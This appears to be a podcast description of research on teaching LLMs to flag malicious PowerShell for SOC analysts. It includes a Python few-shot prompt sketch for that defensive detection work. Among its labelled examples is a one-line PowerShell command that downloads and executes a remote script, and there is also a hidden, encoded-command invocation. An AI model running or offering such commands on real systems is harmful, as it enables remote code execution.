Teaching LLMs to spot malicious PowerShell scripts
Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can help security operations center analysts identify malicious PowerShell scripts. From teaching LLMs through examples to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, each with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html
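The full methodology is in the linked blog post, but as a rough illustration of the first approach (teaching the LLM through examples), a few-shot classification prompt might be assembled along these lines. The example scripts, labels, and prompt wording below are illustrative assumptions, not Ryan's actual prompts or results:

```python
# Minimal sketch of few-shot prompting an LLM to judge whether a PowerShell
# script looks malicious. The examples and wording are illustrative only.

FEW_SHOT_EXAMPLES = [
    ("Get-ChildItem C:\\Users -Recurse | Measure-Object", "benign"),
    ("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')", "malicious"),
]

def build_prompt(script: str) -> str:
    """Assemble a few-shot classification prompt for an LLM."""
    lines = [
        "You are a SOC analyst. Label each PowerShell script as 'malicious' or 'benign'.",
        "",
    ]
    for example, label in FEW_SHOT_EXAMPLES:
        lines += [f"Script: {example}", f"Label: {label}", ""]
    lines += [f"Script: {script}", "Label:"]
    return "\n".join(lines)

if __name__ == "__main__":
    suspect = "powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0A"
    # Send this prompt to whichever LLM endpoint you use; the response text
    # is the predicted label.
    print(build_prompt(suspect))
```

The retrieval-augmented and fine-tuned variants Ryan discusses build on the same classification task, adding retrieved security context to the prompt or training a specialized model instead of relying on in-context examples.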